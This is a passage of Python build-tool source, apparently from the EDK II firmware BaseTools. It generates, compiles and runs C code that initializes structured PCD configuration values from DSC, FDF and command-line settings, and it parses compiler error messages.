CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, %s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DscRawValue.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in pcddefaultvalue:
CApp = CApp + ' PcdArraySize = %d < sizeof(%s) * %d ? %d: sizeof(%s) * %d;\n ' % (ValueSize,Pcd.BaseDatumType,pcdarraysize,ValueSize,Pcd.BaseDatumType,pcdarraysize)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
inheritvalue = inherit_OverrideValues.get(DefaultStoreName)
if not inheritvalue:
inheritvalue = []
for index in inheritvalue:
FieldList = inheritvalue[index]
if not FieldList:
continue
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT) or (( (SkuName, '') not in Pcd.ValueChain) and ( (SkuName, DefaultStoreName) not in Pcd.ValueChain )):
for FieldName in FieldList:
indicator = self.GetIndicator(index, FieldName,Pcd)
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (indicator, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' %s = %dULL; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' %s = %d; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateInitValueStatement(Pcd, SkuName, DefaultStoreName):
CApp = ' Assign_%s_%s_%s_%s_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, SkuName, DefaultStoreName)
return CApp
def GenerateCommandLineValue(self, Pcd):
CApp = "// Value in CommandLine\n"
CApp = CApp + "void Assign_%s_%s_CommandLine_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
pcddefaultvalue = Pcd.PcdValueFromComm
for FieldList in [pcddefaultvalue, Pcd.PcdFieldValueFromComm]:
if not FieldList:
continue
if pcddefaultvalue and FieldList == pcddefaultvalue:
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from Command: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From Command Line \n' % (Value)
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' Value = %s; // From Command Line.\n' % (DscBuildData.IntToCString(Value, ValueSize))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
except:
print("error")
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&Pcd->%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (FieldName, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' Pcd->%s = %dULL; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' Pcd->%s = %d; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateCommandLineValueStatement(Pcd):
CApp = ' Assign_%s_%s_CommandLine_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GenerateFdfValue(self,Pcd):
CApp = "// Value in Fdf\n"
CApp = CApp + "void Assign_%s_%s_Fdf_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
pcddefaultvalue = Pcd.PcdValueFromFdf
for FieldList in [pcddefaultvalue,Pcd.PcdFieldValueFromFdf]:
if not FieldList:
continue
if pcddefaultvalue and FieldList == pcddefaultvalue:
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from Fdf: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From Fdf \n' % (Value)
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' Value = %s; // From Fdf .\n' % (DscBuildData.IntToCString(Value, ValueSize))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
except:
print("error")
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName,Pcd.TokenCName,FieldName)),FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&Pcd->%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (FieldName, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' Pcd->%s = %dULL; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' Pcd->%s = %d; // From %s Line %s Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateFdfValueStatement(Pcd):
CApp = ' Assign_%s_%s_Fdf_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GenerateInitializeFunc(self, SkuName, DefaultStore, Pcd, InitByteValue, CApp):
OverrideValues = {DefaultStore:{}}
if Pcd.SkuOverrideValues:
OverrideValues = Pcd.SkuOverrideValues[SkuName]
if not OverrideValues:
OverrideValues = {TAB_DEFAULT_STORES_DEFAULT:Pcd.DefaultValues}
for DefaultStoreName in OverrideValues:
CApp = CApp + 'void\n'
CApp = CApp + 'Initialize_%s_%s_%s_%s(\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' void\n'
CApp = CApp + ' )\n'
CApp = CApp + '{\n'
CApp = CApp + ' UINT32 Size;\n'
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 OriginalSize;\n'
CApp = CApp + ' VOID *OriginalPcd;\n'
CApp = CApp + ' %s *Pcd; // From %s Line %d \n' % (Pcd.BaseDatumType,Pcd.PkgPath, Pcd.PcdDefineLineNo)
CApp = CApp + '\n'
PcdDefaultValue = StringToArray(Pcd.DefaultValueFromDec.strip())
InitByteValue += '%s.%s.%s.%s|%s|%s\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.DatumType, PcdDefaultValue)
#
# Get current PCD value and size
#
CApp = CApp + ' OriginalPcd = PcdGetPtr (%s, %s, %s, %s, &OriginalSize);\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
#
# Determine the size of the PCD. For simple structures, sizeof(TYPE) provides
# the correct value. For structures with a flexible array member, the flexible
# array member is detected, and the size is based on the highest index used with
# the flexible array member. The flexible array member must be the last field
# in a structure. The size formula for this case is:
# OFFSET_OF(FlexbleArrayField) + sizeof(FlexibleArray[0]) * (HighestIndex + 1)
#
CApp = CApp + DscBuildData.GenerateSizeStatments(Pcd,SkuName,DefaultStoreName)
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
CApp = CApp + ' OriginalSize = OriginalSize < sizeof(%s) * %d? OriginalSize:sizeof(%s) * %d; \n' % (Pcd.BaseDatumType,Pcd.PcdArraySize(),Pcd.BaseDatumType,Pcd.PcdArraySize())
CApp = CApp + ' Size = sizeof(%s) * %d; \n' % (Pcd.BaseDatumType,Pcd.PcdArraySize())
#
# Allocate and zero buffer for the PCD
# Must handle cases where current value is smaller, larger, or same size
# Always keep that larger one as the current size
#
CApp = CApp + ' Size = (OriginalSize > Size ? OriginalSize : Size);\n'
CApp = CApp + ' Pcd = (%s *)malloc (Size);\n' % (Pcd.BaseDatumType,)
CApp = CApp + ' memset (Pcd, 0, Size);\n'
#
# Copy current PCD value into allocated buffer.
#
CApp = CApp + ' memcpy (Pcd, OriginalPcd, OriginalSize);\n'
#
# Assign field values in PCD
#
CApp = CApp + DscBuildData.GenerateDefaultValueAssignStatement(Pcd)
if Pcd.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
for skuname in self.SkuIdMgr.GetSkuChain(SkuName):
storeset = [DefaultStoreName] if DefaultStoreName == TAB_DEFAULT_STORES_DEFAULT else [TAB_DEFAULT_STORES_DEFAULT, DefaultStoreName]
for defaultstorenameitem in storeset:
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (skuname, defaultstorenameitem)
CApp = CApp + DscBuildData.GenerateInitValueStatement(Pcd, skuname, defaultstorenameitem)
if skuname == SkuName:
break
else:
CApp = CApp + "// SkuName: %s, DefaultStoreName: STANDARD \n" % self.SkuIdMgr.SystemSkuId
CApp = CApp + DscBuildData.GenerateInitValueStatement(Pcd, self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT)
CApp = CApp + DscBuildData.GenerateFdfValueStatement(Pcd)
CApp = CApp + DscBuildData.GenerateCommandLineValueStatement(Pcd)
#
# Set new PCD value and size
#
CApp = CApp + ' PcdSetPtr (%s, %s, %s, %s, Size, (void *)Pcd);\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
#
# Free PCD
#
CApp = CApp + ' free (Pcd);\n'
CApp = CApp + '}\n'
CApp = CApp + '\n'
return InitByteValue, CApp
def GenerateArrayAssignment(self, Pcd):
CApp = ""
if not Pcd:
return CApp
Demesion = ""
for d in Pcd.Capacity:
Demesion += "[]"
Value = Pcd.DefaultValueFromDec
if "{CODE(" in Pcd.DefaultValueFromDec:
realvalue = Pcd.DefaultValueFromDec.strip()[6:-2] # "{CODE(").rstrip(")}"
CApp += "static %s %s_%s_INIT_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Demesion,realvalue)
if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
for skuname in Pcd.SkuInfoList:
skuinfo = Pcd.SkuInfoList[skuname]
if skuinfo.VariableName:
for defaultstore in skuinfo.DefaultStoreDict:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, skuname, defaultstore)
if pcddscrawdefaultvalue:
Value = skuinfo.DefaultStoreDict[defaultstore]
if "{CODE(" in Value:
realvalue = Value.strip()[6:-2] # "{CODE(").rstrip(")}"
CApp += "static %s %s_%s_%s_%s_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore,Demesion,realvalue)
else:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, skuname, TAB_DEFAULT_STORES_DEFAULT)
if pcddscrawdefaultvalue:
Value = skuinfo.DefaultValue
if "{CODE(" in Value:
realvalue = Value.strip()[6:-2] # "{CODE(").rstrip(")}"
CApp += "static %s %s_%s_%s_%s_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT,Demesion,realvalue)
else:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT)
if pcddscrawdefaultvalue:
if "{CODE(" in Pcd.DefaultValue:
realvalue = Pcd.DefaultValue.strip()[6:-2] # "{CODE(").rstrip(")}"
CApp += "static %s %s_%s_DEFAULT_STANDARD_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Demesion,realvalue)
return CApp
def SkuOverrideValuesEmpty(self,OverrideValues):
if not OverrideValues:
return True
for key in OverrideValues:
if OverrideValues[key]:
return False
return True
def ParseCCFlags(self, ccflag):
ccflags = set()
ccflaglist = ccflag.split(" ")
i = 0
while i < len(ccflaglist):
item = ccflaglist[i].strip()
if item in (r"/D", r"/U","-D","-U"):
ccflags.add(" ".join((ccflaglist[i],ccflaglist[i+1])))
i = i+1
elif item.startswith((r"/D", r"/U","-D","-U")):
ccflags.add(item)
i +=1
return ccflags
def GenerateByteArrayValue (self, StructuredPcds):
#
# Generate/Compile/Run C application to determine if there are any flexible array members
#
if not StructuredPcds:
return
InitByteValue = ""
CApp = PcdMainCHeader
IncludeFiles = set()
for PcdName in StructuredPcds:
Pcd = StructuredPcds[PcdName]
for IncludeFile in Pcd.StructuredPcdIncludeFile:
if IncludeFile not in IncludeFiles:
IncludeFiles.add(IncludeFile)
CApp = CApp + '#include <%s>\n' % (IncludeFile)
CApp = CApp + '\n'
for Pcd in StructuredPcds.values():
CApp = CApp + self.GenerateArrayAssignment(Pcd)
for PcdName in StructuredPcds:
Pcd = StructuredPcds[PcdName]
CApp = CApp + self.GenerateSizeFunction(Pcd)
CApp = CApp + self.GenerateDefaultValueAssignFunction(Pcd)
CApp = CApp + self.GenerateFdfValue(Pcd)
CApp = CApp + self.GenerateCommandLineValue(Pcd)
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
CApp = CApp + self.GenerateInitValueFunction(Pcd, self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in Pcd.SkuOverrideValues:
continue
for DefaultStoreName in Pcd.SkuOverrideValues[SkuName]:
CApp = CApp + self.GenerateInitValueFunction(Pcd, SkuName, DefaultStoreName)
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
InitByteValue, CApp = self.GenerateInitializeFunc(self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT, Pcd, InitByteValue, CApp)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in Pcd.SkuOverrideValues:
continue
for DefaultStoreName in Pcd.DefaultStoreName:
Pcd = StructuredPcds[PcdName]
InitByteValue, CApp = self.GenerateInitializeFunc(SkuName, DefaultStoreName, Pcd, InitByteValue, CApp)
CApp = CApp + 'VOID\n'
CApp = CApp + 'PcdEntryPoint(\n'
CApp = CApp + ' VOID\n'
CApp = CApp + ' )\n'
CApp = CApp + '{\n'
for Pcd in StructuredPcds.values():
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD], self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
CApp = CApp + ' Initialize_%s_%s_%s_%s();\n' % (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in self.SkuIdMgr.AvailableSkuIdSet:
continue
for DefaultStoreName in Pcd.SkuOverrideValues[SkuName]:
CApp = CApp + ' Initialize_%s_%s_%s_%s();\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + '}\n'
CApp = CApp + PcdMainCEntry + '\n'
if not os.path.exists(self.OutputPath):
os.makedirs(self.OutputPath)
CAppBaseFileName = os.path.join(self.OutputPath, PcdValueInitName)
SaveFileOnChange(CAppBaseFileName + '.c', CApp, False)
MakeApp = PcdMakefileHeader
if sys.platform == "win32":
MakeApp = MakeApp + 'APPFILE = %s\%s.exe\n' % (self.OutputPath, PcdValueInitName) + 'APPNAME = %s\n' % (PcdValueInitName) + 'OBJECTS = %s\%s.obj\n' % (self.OutputPath, PcdValueInitName) + 'INC = '
else:
MakeApp = MakeApp + PcdGccMakefile
MakeApp = MakeApp + 'APPFILE = %s/%s\n' % (self.OutputPath, PcdValueInitName) + 'APPNAME = %s\n' % (PcdValueInitName) + 'OBJECTS = %s/%s.o\n' % (self.OutputPath, PcdValueInitName) + \
'include $(MAKEROOT)/Makefiles/app.makefile\n' + 'INCLUDE +='
IncSearchList = []
PlatformInc = OrderedDict()
for Cache in self._Bdb._CACHE_.values():
if Cache.MetaFile.Ext.lower() != '.dec':
continue
if Cache.Includes:
if str(Cache.MetaFile.Path) not in PlatformInc:
PlatformInc[str(Cache.MetaFile.Path)] = []
PlatformInc[str(Cache.MetaFile.Path)].append (os.path.dirname(Cache.MetaFile.Path))
PlatformInc[str(Cache.MetaFile.Path)].extend (Cache.CommonIncludes)
PcdDependDEC = []
for Pcd in StructuredPcds.values():
for PackageDec in Pcd.PackageDecs:
Package = os.path.normpath(mws.join(GlobalData.gWorkspace, PackageDec))
if not os.path.exists(Package):
EdkLogger.error('Build', RESOURCE_NOT_AVAILABLE, "The dependent Package %s of PCD %s.%s is not exist." % (PackageDec, Pcd.TokenSpaceGuidCName, Pcd.TokenCName))
if Package not in PcdDependDEC:
PcdDependDEC.append(Package)
if PlatformInc and PcdDependDEC:
for pkg in PcdDependDEC:
if pkg in PlatformInc:
for inc in PlatformInc[pkg]:
MakeApp += '-I' + str(inc) + ' '
IncSearchList.append(inc)
MakeApp = MakeApp + '\n'
CC_FLAGS = LinuxCFLAGS
if sys.platform == "win32":
CC_FLAGS = WindowsCFLAGS
BuildOptions = OrderedDict()
for Options in self.BuildOptions:
if Options[2] != EDKII_NAME:
continue
Family = Options[0]
if Family and Family != self.ToolChainFamily:
continue
Target, Tag, Arch, Tool, Attr = Options[1].split("_")
if Tool != 'CC':
continue
if Attr != "FLAGS":
continue
if Target == TAB_STAR or Target == self._Target:
if Tag == TAB_STAR or Tag == self._Toolchain:
if 'COMMON' not in BuildOptions:
BuildOptions['COMMON'] = set()
if Arch == TAB_STAR:
BuildOptions['COMMON']|= self.ParseCCFlags(self.BuildOptions[Options])
if Arch in self.SupArchList:
if Arch not in BuildOptions:
BuildOptions[Arch] = set()
BuildOptions[Arch] |= self.ParseCCFlags(self.BuildOptions[Options])
if BuildOptions:
ArchBuildOptions = {arch:flags for arch,flags in BuildOptions.items() if arch != 'COMMON'}
if len(ArchBuildOptions.keys()) == 1:
BuildOptions['COMMON'] |= (list(ArchBuildOptions.values())[0])
elif len(ArchBuildOptions.keys()) > 1:
CommonBuildOptions = reduce(lambda x,y: x&y, ArchBuildOptions.values())
BuildOptions['COMMON'] |= CommonBuildOptions
ValueList = [item for item in BuildOptions['COMMON'] if item.startswith((r"/U","-U"))]
ValueList.extend([item for item in BuildOptions['COMMON'] if item.startswith((r"/D", "-D"))])
CC_FLAGS += " ".join(ValueList)
MakeApp += CC_FLAGS
if sys.platform == "win32":
MakeApp = MakeApp + PcdMakefileEnd
MakeApp = MakeApp + AppTarget % ("""\tcopy $(APPLICATION) $(APPFILE) /y """)
else:
MakeApp = MakeApp + AppTarget % ("""\tcp $(APPLICATION) $(APPFILE) """)
MakeApp = MakeApp + '\n'
IncludeFileFullPaths = []
for includefile in IncludeFiles:
for includepath in IncSearchList:
includefullpath = os.path.join(str(includepath), includefile)
if os.path.exists(includefullpath):
IncludeFileFullPaths.append(os.path.normpath(includefullpath))
break
SearchPathList = []
SearchPathList.append(os.path.normpath(mws.join(GlobalData.gWorkspace, "BaseTools/Source/C/Include")))
SearchPathList.append(os.path.normpath(mws.join(GlobalData.gWorkspace, "BaseTools/Source/C/Common")))
SearchPathList.extend(str(item) for item in IncSearchList)
IncFileList = GetDependencyList(IncludeFileFullPaths, SearchPathList)
for include_file in IncFileList:
MakeApp += "$(OBJECTS) : %s\n" % include_file
MakeFileName = os.path.join(self.OutputPath, 'Makefile')
MakeApp += "$(OBJECTS) : %s\n" % MakeFileName
SaveFileOnChange(MakeFileName, MakeApp, False)
InputValueFile = os.path.join(self.OutputPath, 'Input.txt')
OutputValueFile = os.path.join(self.OutputPath, 'Output.txt')
SaveFileOnChange(InputValueFile, InitByteValue, False)
Dest_PcdValueInitExe = PcdValueInitName
if not sys.platform == "win32":
Dest_PcdValueInitExe = os.path.join(self.OutputPath, PcdValueInitName)
else:
Dest_PcdValueInitExe = os.path.join(self.OutputPath, PcdValueInitName) +".exe"
Messages = ''
if sys.platform == "win32":
MakeCommand = 'nmake -f %s' % (MakeFileName)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (MakeCommand)
Messages = StdOut
else:
MakeCommand = 'make -f %s' % (MakeFileName)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (MakeCommand)
Messages = StdErr
Messages = Messages.split('\n')
MessageGroup = []
if returncode != 0:
CAppBaseFileName = os.path.join(self.OutputPath, PcdValueInitName)
File = open (CAppBaseFileName + '.c', 'r')
FileData = File.readlines()
File.close()
for Message in Messages:
if " error" in Message or "warning" in Message:
FileInfo = Message.strip().split('(')
if len (FileInfo) > 1:
FileName = FileInfo [0]
FileLine = FileInfo [1].split (')')[0]
else:
FileInfo = Message.strip().split(':')
if len(FileInfo) < 2:
continue
FileName = FileInfo [0]
FileLine = FileInfo [1]
if FileLine.isdigit():
error_line = FileData[int (FileLine) - 1]
if r"//" in error_line:
